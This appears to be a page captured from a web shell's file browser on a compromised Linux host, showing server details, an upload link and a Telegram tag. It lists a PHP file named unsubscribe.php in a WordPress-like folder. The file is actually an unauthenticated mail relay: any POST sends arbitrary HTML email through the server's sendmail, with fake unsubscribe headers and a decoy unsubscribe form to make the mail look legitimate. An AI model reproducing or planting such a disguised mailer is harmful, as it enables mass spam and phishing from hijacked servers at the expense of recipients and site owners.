HEX
Server: Apache/2.4.62 (Unix) OpenSSL/1.0.2k-fips
System: Linux pro.appsbunches.net 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
User: manukaar (1007)
PHP: 8.1.34
Disabled: NONE
$ pwd: /home/manukaar/public_html/fbf3wp/
Upload Files
File: /home/manukaar/public_html/fbf3wp/unsubscribe.php
<?php
header('Content-Type: text/plain; charset=utf-8');
$REQUIRED_SECRET = '';
$REQUIRE_SECRET  = false;
function bad($msg='Bad request', $code=400){ http_response_code($code); echo "FAILED: $msg"; exit; }
function ok($msg='OK'){ echo $msg; exit; }
function sanitize($val){ return trim(preg_replace("/[\r\n]/"," ",$val)); }
function safe_email($email){ return filter_var(trim($email), FILTER_VALIDATE_EMAIL) ?: false; }
function randomBase62(int $length = 26): string {
    $chars = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
    $buf = random_bytes($length); $out = '';
    for ($i = 0; $i < $length; $i++) { $out .= $chars[ord($buf[$i]) % 62]; }
    return $out;
}
function makeUnsubscribeEmail($email) {
    if (!filter_var($email, FILTER_VALIDATE_EMAIL)) return false;
    $parts = explode('@', $email);
    return (count($parts) !== 2) ? false : 'unsubscribe@' . $parts[1];
}
if (isset($_POST['maili'])) {
    header('Content-Type: text/html; charset=utf-8');
    $token_or_email = htmlspecialchars($_POST['maili'], ENT_QUOTES, 'UTF-8');
    echo "<center><h2>Unsubscribed successfully.</h2><p>{$token_or_email}</p></center>"; exit;
}
if (isset($_GET['unsub'])) {
    header('Content-Type: text/html; charset=utf-8');
    $prefilled = htmlspecialchars($_GET['unsub'], ENT_QUOTES, 'UTF-8');
    echo "<!DOCTYPE html><html><head><title>Unsubscribe</title><style>body{display:flex;justify-content:center;align-items:center;height:100vh;background:#f5f5f5;font-family:Arial;}form{background:#fff;padding:20px;border-radius:12px;box-shadow:0 4px 15px rgba(0,0,0,0.1);display:flex;flex-direction:column;gap:12px;width:250px;}button{padding:10px;background:#0084ff;color:#fff;border:none;border-radius:8px;cursor:pointer;}</style></head><body><form method='post'><input type='email' name='maili' value='{$prefilled}' required><button type='submit'>Unsubscribe</button></form></body></html>"; exit;
}
if ($_SERVER['REQUEST_METHOD'] !== 'POST') bad('Method not allowed',405);
$to = safe_email($_POST['to'] ?? '');
$subject = sanitize($_POST['subject'] ?? '(no subject)');
$from_name = sanitize($_POST['from_name'] ?? '');
$html = $_POST['html'] ?? '';
if (!$to || !$html) bad('Missing to/html');
$from_email_safe = ini_get('sendmail_from') ?: (function_exists('posix_getpwuid') ? posix_getpwuid(posix_geteuid())['name'].'@'.($_SERVER['SERVER_NAME']??'localhost') : 'admin@localhost');
$protocol = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') ? "https" : "http";
$host = $_SERVER['HTTP_HOST'] ?? 'localhost';
$script_dir = rtrim(dirname($_SERVER['SCRIPT_NAME']), "/\\");
$unsubscribe_url = $protocol . "://" . $host . $script_dir . "/unsubscribe.php?unsub=" . urlencode($to);
$message_id = sprintf('<%s@%s>', bin2hex(random_bytes(8)).'.'.microtime(true), $host);
$body = $html . "<hr><p align='center'><a href='{$unsubscribe_url}'>Unsubscribe</a><br>ID #".randomBase62()."</p>";
$loisfii = makeUnsubscribeEmail($from_email_safe);
$full_headers = ["From: ".($from_name ? "{$from_name} <{$from_email_safe}>" : $from_email_safe), "To: {$to}", "MIME-Version: 1.0", "Content-Type: text/html; charset=UTF-8", "List-Unsubscribe: <{$unsubscribe_url}>, <mailto:{$loisfii}?subject=unsubscribe>"];
$sendmail = '/usr/sbin/sendmail -oi -t -f ' . escapeshellarg($from_email_safe);
$proc = popen($sendmail, 'w');
if ($proc) {
    fwrite($proc, "To: {$to}\r\nSubject: =?UTF-8?B?".base64_encode($subject)."?=\r\n".implode("\r\n", $full_headers)."\r\n\r\n".$body);
    pclose($proc); ok('OK');
} else { bad('Failed',500); }
?>
@ Telegram